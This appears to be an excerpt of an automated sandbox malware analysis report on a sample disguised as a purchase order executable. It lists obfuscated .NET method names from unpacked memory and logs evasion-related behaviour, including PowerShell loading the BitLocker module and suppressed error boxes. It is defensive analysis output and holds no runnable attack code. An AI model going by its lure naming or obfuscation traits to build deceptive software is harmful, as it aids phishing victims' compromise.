Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, iadXmCzC34PNtLgm7M.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lehF1r1v43', 'k9CFUqp7wM', 'j83FGuvgsN', 'aeVFt35HTE', 'kQqF6o2gKT', 'w19FFVWwjK', 'zAcFaF9wyU'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, tlRSVVuDgsKA0CXT0o.cs	High entropy of concatenated method names: 'dxfTQ7DVR3', 'QwpTbBtdY2', 'GKUT4sifiD', 'WDvTlElOQp', 'lpsTAG2Ow6', 'V1xTNaOpjj', 'VAHTmHAluf', 'TSMTIs0yTi', 'kLPTVnlfgN', 'MXPTnWucb4'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, qs6X13jo79liA4qpRG.cs	High entropy of concatenated method names: 'TftFhYiHEG', 'mmxFZVwBCZ', 'YGbF7fAKHn', 'um0FHDvTkD', 'DSSFgn3bsx', 'acTFo9HlMJ', 'GceFBk8IxU', 'Xdy6y9tLAp', 'w9p6Ret9uW', 'xt46iPSobr'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, QoIkhhYbTSMGuR8INc.cs	High entropy of concatenated method names: 'ToString', 'ghEGKc2iJL', 'QtbGOQB8Bn', 'XUiG0jXCZB', 'oIOG2DnyyS', 'oTjGMvRWqD', 'bVeGLjVVwW', 'bNdGPRPQ9q', 'IaBGvMHTOk', 'hU6GuNivU5'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, rHfq9Rhe45v49FJHf5F.cs	High entropy of concatenated method names: 'YNiFQ37Uj4', 'K2WFbDZRNH', 'bKWF4RPcOh', 'MGYFlIW9oE', 'aTTFADQ3BW', 'fY4FN4LLVI', 'h0fFmTXPr4', 'cHPFIDd1ky', 'WXiFV4mr7C', 'FeQFnWqX1d'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, l1j8iaRP3RQoLWVUbU.cs	High entropy of concatenated method names: 'dUf6HEmnfr', 'hia6g1yZPg', 'aMp6DbH2l2', 'qWp6oiDlYk', 'a5j6BlLGgV', 'FGN6TCshJh', 'm7U6fACakK', 'FxZ6ra9LYg', 'fFA6d0quOF', 'IcN6x8FQxc'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, pKQ63gSnW8KStsUOvB.cs	High entropy of concatenated method names: 'l22BCR00Ri', 'PSdBgTUO8J', 'VlmBoeaKOg', 'JJcBTp86Dt', 'kcuBfllAqS', 'VDeocupURc', 'D4HoWhtcxi', 'DCZoy7C5DY', 'OVKoRoYMIt', 'rv5oi7WHTq'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, suXuY2gFs2qKcgS69B.cs	High entropy of concatenated method names: 'Dispose', 'b6xhig8v4d', 'KNqsOI5GaJ', 'CXGllrJcW1', 'Bd1hjj8iaP', 'PRQhzoLWVU', 'ProcessDialogKey', 'yUZseSTvmA', 'LhashfFqgq', 'Iwass6s6X1'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, cSTvmAiPhafFqgq0wa.cs	High entropy of concatenated method names: 'MFC6S6ZRM7', 'pdS6OabSjA', 'S4560WheQm', 'J9j62P12C4', 'p1e6Xhx522', 'wNo6MsmbG3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, b9bGJTX07refrtngyX.cs	High entropy of concatenated method names: 'KvsU5iP3Tj', 'aXvU36eZB5', 'MnHUXVKQML', 'j9MU8XUGyC', 'U3sUOjDgJS', 'cxHU0nq8ke', 'wk0U2i2pMa', 'vDVUMadG7b', 'zl6ULtB7J6', 'sHNUPnrkNv'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	High entropy of concatenated method names: 'zGeZCMVSQ3', 'H1AZHxSSwi', 'ufVZgZ4SlZ', 'vWlZDckeGE', 'IqkZomCyAJ', 'wDLZBGHYsp', 'Kr7ZTMQior', 'ym2Zfpc94j', 'YyLZriHeeU', 'zctZdmJiim'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, RuBRpjsmQGSktTD3uU.cs	High entropy of concatenated method names: 'rrY4OMbRg', 'Sd9lqJEJo', 'TINNCtZNA', 'zhhmsHyuy', 'BYfVosS5t', 'aFanYW5e7', 'NInBKgpagerVWx7bjo', 'YZjN8IMuIAAicIAFb2', 'vKb6CCeVA', 'sbHaHqY7R'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, KlDYvuPcJ4ZXDLlD2t.cs	High entropy of concatenated method names: 'WfHTHwXPJM', 'AQMTDYuWhh', 'pFuTBNg3gb', 'o9uBjuTvo7', 'C6qBznSAKw', 'FvPTetAWCM', 'LLUTha42vF', 'TQgTsCgY1W', 'xLcTZ86bK8', 'RLxT70nYoV'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, H48JFYq2tdnsnGG75c.cs	High entropy of concatenated method names: 'uKt1IfjhdZ', 'tfJ1V8Md6R', 'cL21SbNCKe', 'VU91Oj37QJ', 'a1x12b1eOE', 'Wa01MJYIFE', 'Ipc1PkXPU0', 'NQu1vRfDwA', 'zoR15u42Pb', 'kUH1KdmSFq'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, uuVRExIJeZcn6YBP0r.cs	High entropy of concatenated method names: 'eE8gXOKDwQ', 'durg8mRLfi', 'oo3gYX5Gge', 'nLOgpSsvnZ', 'JFpgcA61di', 'fapgWvqgFW', 'vc8gyvMEse', 'GCmgRpqJdd', 'yATgiZo7rb', 'UFegjU9PUH'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, b2nk8xnoNtknNlXL4j.cs	High entropy of concatenated method names: 'Bx2oA5oKce', 'GZ3omGlXvj', 'CDoD0JH2HA', 'WNcD2uYIK6', 'VWWDMG2FIL', 'oZ8DLplkNk', 'smeDP7t9c6', 'LyXDvhow1w', 'zW8Du0EWTV', 'v8nD5GveZD'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, EAITTaDa7fhQTL9u84.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6JsiXCudU', 'vkhsjoVuck', 'LxlszaoAO8', 'FSgZeTEMCG', 'XDBZhZH1y4', 'kHBZsa0Dij', 'YXVZZri3tV', 'vpDdN9cVVk9tnC40KGt'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, p3ZODThZKAsx5ayVEbv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0SaXnvvWG', 'croa85yXTw', 'bYXaYNTPhb', 'T2iapYFRZk', 'xE2acOqXFb', 'm42aWXxSTv', 'CfRayeS1VR'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, hSbyLT792GkOJwvO67.cs	High entropy of concatenated method names: 'RYJhTuVREx', 'ueZhfcn6YB', 'i3ZhdrJYns', 'es8hxxs2nk', 'AXLhU4jGKQ', 'q3ghGnW8KS', 'ztBRY0dMOukhSVWrXZ', 'uZgXQgrRryfEWfnOYJ', 'Br0hhFHKR7', 'YI1hZFynme'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, aDNJxoV3ZrJYnsCs8x.cs	High entropy of concatenated method names: 'HNPDllJ11J', 's40DNnrMLa', 'YAwDIjGW6l', 'dgSDVDacoO', 'vwXDUYxxka', 'ksnDGwInxi', 'Qd5DttQtEr', 'N7qD6AhmOd', 'NbODFpfpGt', 'v4oDaCZfUh'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, iadXmCzC34PNtLgm7M.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lehF1r1v43', 'k9CFUqp7wM', 'j83FGuvgsN', 'aeVFt35HTE', 'kQqF6o2gKT', 'w19FFVWwjK', 'zAcFaF9wyU'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, tlRSVVuDgsKA0CXT0o.cs	High entropy of concatenated method names: 'dxfTQ7DVR3', 'QwpTbBtdY2', 'GKUT4sifiD', 'WDvTlElOQp', 'lpsTAG2Ow6', 'V1xTNaOpjj', 'VAHTmHAluf', 'TSMTIs0yTi', 'kLPTVnlfgN', 'MXPTnWucb4'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, qs6X13jo79liA4qpRG.cs	High entropy of concatenated method names: 'TftFhYiHEG', 'mmxFZVwBCZ', 'YGbF7fAKHn', 'um0FHDvTkD', 'DSSFgn3bsx', 'acTFo9HlMJ', 'GceFBk8IxU', 'Xdy6y9tLAp', 'w9p6Ret9uW', 'xt46iPSobr'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, QoIkhhYbTSMGuR8INc.cs	High entropy of concatenated method names: 'ToString', 'ghEGKc2iJL', 'QtbGOQB8Bn', 'XUiG0jXCZB', 'oIOG2DnyyS', 'oTjGMvRWqD', 'bVeGLjVVwW', 'bNdGPRPQ9q', 'IaBGvMHTOk', 'hU6GuNivU5'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, rHfq9Rhe45v49FJHf5F.cs	High entropy of concatenated method names: 'YNiFQ37Uj4', 'K2WFbDZRNH', 'bKWF4RPcOh', 'MGYFlIW9oE', 'aTTFADQ3BW', 'fY4FN4LLVI', 'h0fFmTXPr4', 'cHPFIDd1ky', 'WXiFV4mr7C', 'FeQFnWqX1d'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, l1j8iaRP3RQoLWVUbU.cs	High entropy of concatenated method names: 'dUf6HEmnfr', 'hia6g1yZPg', 'aMp6DbH2l2', 'qWp6oiDlYk', 'a5j6BlLGgV', 'FGN6TCshJh', 'm7U6fACakK', 'FxZ6ra9LYg', 'fFA6d0quOF', 'IcN6x8FQxc'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, pKQ63gSnW8KStsUOvB.cs	High entropy of concatenated method names: 'l22BCR00Ri', 'PSdBgTUO8J', 'VlmBoeaKOg', 'JJcBTp86Dt', 'kcuBfllAqS', 'VDeocupURc', 'D4HoWhtcxi', 'DCZoy7C5DY', 'OVKoRoYMIt', 'rv5oi7WHTq'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, suXuY2gFs2qKcgS69B.cs	High entropy of concatenated method names: 'Dispose', 'b6xhig8v4d', 'KNqsOI5GaJ', 'CXGllrJcW1', 'Bd1hjj8iaP', 'PRQhzoLWVU', 'ProcessDialogKey', 'yUZseSTvmA', 'LhashfFqgq', 'Iwass6s6X1'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, cSTvmAiPhafFqgq0wa.cs	High entropy of concatenated method names: 'MFC6S6ZRM7', 'pdS6OabSjA', 'S4560WheQm', 'J9j62P12C4', 'p1e6Xhx522', 'wNo6MsmbG3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, b9bGJTX07refrtngyX.cs	High entropy of concatenated method names: 'KvsU5iP3Tj', 'aXvU36eZB5', 'MnHUXVKQML', 'j9MU8XUGyC', 'U3sUOjDgJS', 'cxHU0nq8ke', 'wk0U2i2pMa', 'vDVUMadG7b', 'zl6ULtB7J6', 'sHNUPnrkNv'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	High entropy of concatenated method names: 'zGeZCMVSQ3', 'H1AZHxSSwi', 'ufVZgZ4SlZ', 'vWlZDckeGE', 'IqkZomCyAJ', 'wDLZBGHYsp', 'Kr7ZTMQior', 'ym2Zfpc94j', 'YyLZriHeeU', 'zctZdmJiim'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, RuBRpjsmQGSktTD3uU.cs	High entropy of concatenated method names: 'rrY4OMbRg', 'Sd9lqJEJo', 'TINNCtZNA', 'zhhmsHyuy', 'BYfVosS5t', 'aFanYW5e7', 'NInBKgpagerVWx7bjo', 'YZjN8IMuIAAicIAFb2', 'vKb6CCeVA', 'sbHaHqY7R'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, KlDYvuPcJ4ZXDLlD2t.cs	High entropy of concatenated method names: 'WfHTHwXPJM', 'AQMTDYuWhh', 'pFuTBNg3gb', 'o9uBjuTvo7', 'C6qBznSAKw', 'FvPTetAWCM', 'LLUTha42vF', 'TQgTsCgY1W', 'xLcTZ86bK8', 'RLxT70nYoV'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, H48JFYq2tdnsnGG75c.cs	High entropy of concatenated method names: 'uKt1IfjhdZ', 'tfJ1V8Md6R', 'cL21SbNCKe', 'VU91Oj37QJ', 'a1x12b1eOE', 'Wa01MJYIFE', 'Ipc1PkXPU0', 'NQu1vRfDwA', 'zoR15u42Pb', 'kUH1KdmSFq'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, uuVRExIJeZcn6YBP0r.cs	High entropy of concatenated method names: 'eE8gXOKDwQ', 'durg8mRLfi', 'oo3gYX5Gge', 'nLOgpSsvnZ', 'JFpgcA61di', 'fapgWvqgFW', 'vc8gyvMEse', 'GCmgRpqJdd', 'yATgiZo7rb', 'UFegjU9PUH'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, b2nk8xnoNtknNlXL4j.cs	High entropy of concatenated method names: 'Bx2oA5oKce', 'GZ3omGlXvj', 'CDoD0JH2HA', 'WNcD2uYIK6', 'VWWDMG2FIL', 'oZ8DLplkNk', 'smeDP7t9c6', 'LyXDvhow1w', 'zW8Du0EWTV', 'v8nD5GveZD'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, EAITTaDa7fhQTL9u84.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6JsiXCudU', 'vkhsjoVuck', 'LxlszaoAO8', 'FSgZeTEMCG', 'XDBZhZH1y4', 'kHBZsa0Dij', 'YXVZZri3tV', 'vpDdN9cVVk9tnC40KGt'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, p3ZODThZKAsx5ayVEbv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'h0SaXnvvWG', 'croa85yXTw', 'bYXaYNTPhb', 'T2iapYFRZk', 'xE2acOqXFb', 'm42aWXxSTv', 'CfRayeS1VR'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, hSbyLT792GkOJwvO67.cs	High entropy of concatenated method names: 'RYJhTuVREx', 'ueZhfcn6YB', 'i3ZhdrJYns', 'es8hxxs2nk', 'AXLhU4jGKQ', 'q3ghGnW8KS', 'ztBRY0dMOukhSVWrXZ', 'uZgXQgrRryfEWfnOYJ', 'Br0hhFHKR7', 'YI1hZFynme'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, aDNJxoV3ZrJYnsCs8x.cs	High entropy of concatenated method names: 'HNPDllJ11J', 's40DNnrMLa', 'YAwDIjGW6l', 'dgSDVDacoO', 'vwXDUYxxka', 'ksnDGwInxi', 'Qd5DttQtEr', 'N7qD6AhmOd', 'NbODFpfpGt', 'v4oDaCZfUh'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, iadXmCzC34PNtLgm7M.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lehF1r1v43', 'k9CFUqp7wM', 'j83FGuvgsN', 'aeVFt35HTE', 'kQqF6o2gKT', 'w19FFVWwjK', 'zAcFaF9wyU'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, tlRSVVuDgsKA0CXT0o.cs	High entropy of concatenated method names: 'dxfTQ7DVR3', 'QwpTbBtdY2', 'GKUT4sifiD', 'WDvTlElOQp', 'lpsTAG2Ow6', 'V1xTNaOpjj', 'VAHTmHAluf', 'TSMTIs0yTi', 'kLPTVnlfgN', 'MXPTnWucb4'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, qs6X13jo79liA4qpRG.cs	High entropy of concatenated method names: 'TftFhYiHEG', 'mmxFZVwBCZ', 'YGbF7fAKHn', 'um0FHDvTkD', 'DSSFgn3bsx', 'acTFo9HlMJ', 'GceFBk8IxU', 'Xdy6y9tLAp', 'w9p6Ret9uW', 'xt46iPSobr'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, QoIkhhYbTSMGuR8INc.cs	High entropy of concatenated method names: 'ToString', 'ghEGKc2iJL', 'QtbGOQB8Bn', 'XUiG0jXCZB', 'oIOG2DnyyS', 'oTjGMvRWqD', 'bVeGLjVVwW', 'bNdGPRPQ9q', 'IaBGvMHTOk', 'hU6GuNivU5'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, rHfq9Rhe45v49FJHf5F.cs	High entropy of concatenated method names: 'YNiFQ37Uj4', 'K2WFbDZRNH', 'bKWF4RPcOh', 'MGYFlIW9oE', 'aTTFADQ3BW', 'fY4FN4LLVI', 'h0fFmTXPr4', 'cHPFIDd1ky', 'WXiFV4mr7C', 'FeQFnWqX1d'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, l1j8iaRP3RQoLWVUbU.cs	High entropy of concatenated method names: 'dUf6HEmnfr', 'hia6g1yZPg', 'aMp6DbH2l2', 'qWp6oiDlYk', 'a5j6BlLGgV', 'FGN6TCshJh', 'm7U6fACakK', 'FxZ6ra9LYg', 'fFA6d0quOF', 'IcN6x8FQxc'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, pKQ63gSnW8KStsUOvB.cs	High entropy of concatenated method names: 'l22BCR00Ri', 'PSdBgTUO8J', 'VlmBoeaKOg', 'JJcBTp86Dt', 'kcuBfllAqS', 'VDeocupURc', 'D4HoWhtcxi', 'DCZoy7C5DY', 'OVKoRoYMIt', 'rv5oi7WHTq'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, suXuY2gFs2qKcgS69B.cs	High entropy of concatenated method names: 'Dispose', 'b6xhig8v4d', 'KNqsOI5GaJ', 'CXGllrJcW1', 'Bd1hjj8iaP', 'PRQhzoLWVU', 'ProcessDialogKey', 'yUZseSTvmA', 'LhashfFqgq', 'Iwass6s6X1'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, cSTvmAiPhafFqgq0wa.cs	High entropy of concatenated method names: 'MFC6S6ZRM7', 'pdS6OabSjA', 'S4560WheQm', 'J9j62P12C4', 'p1e6Xhx522', 'wNo6MsmbG3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, b9bGJTX07refrtngyX.cs	High entropy of concatenated method names: 'KvsU5iP3Tj', 'aXvU36eZB5', 'MnHUXVKQML', 'j9MU8XUGyC', 'U3sUOjDgJS', 'cxHU0nq8ke', 'wk0U2i2pMa', 'vDVUMadG7b', 'zl6ULtB7J6', 'sHNUPnrkNv'
Source: 0.2.Purchase Order 007823-PO# 005307.exe.6a00000.5.raw.unpack, WqcMW7fGuvAyFrWZNB.cs	High entropy of concatenated method names: 'zGeZCMVSQ3', 'H1AZHxSSwi', 'ufVZgZ4SlZ', 'vWlZDckeGE', 'IqkZomCyAJ', 'wDLZBGHYsp', 'Kr7ZTMQior', 'ym2Zfpc94j', 'YyLZriHeeU', 'zctZdmJiim'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
